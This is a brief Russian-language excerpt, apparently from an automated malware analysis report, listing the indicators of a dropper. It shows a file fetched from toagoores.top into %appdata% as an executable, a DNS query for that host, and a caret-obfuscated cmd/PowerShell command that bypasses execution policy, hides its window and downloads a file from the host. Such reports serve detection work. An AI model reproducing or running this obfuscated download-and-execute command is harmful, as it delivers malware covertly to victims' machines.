Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^wErsHELl.Ex^E -eXeC^Ut^Io^NPo^LIC^Y B^y^Pas^S^ -n^o^p^RoFI^le -^w^INDowsT^y^Le^ ^HiDdEN^ (n^ew-ob^jecT^ SySTem.^NeT.weB^CLIEN^T^).dOWNloAdfilE^(^'http://toagoores.top/r...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "pO^wErsHELl.Ex^E -eXeC^Ut^Io^NPo^LIC^Y B^y^Pas^S^ -n^o^p^RoFI^le -^w^INDowsT^y^Le^ ^HiDdEN^ (n^ew-ob^jecT^ SySTem.^NeT.weB^CLIEN^T^).dOWNloAdfilE^(^'http://toagoores.top/r...' (со скрытым окном)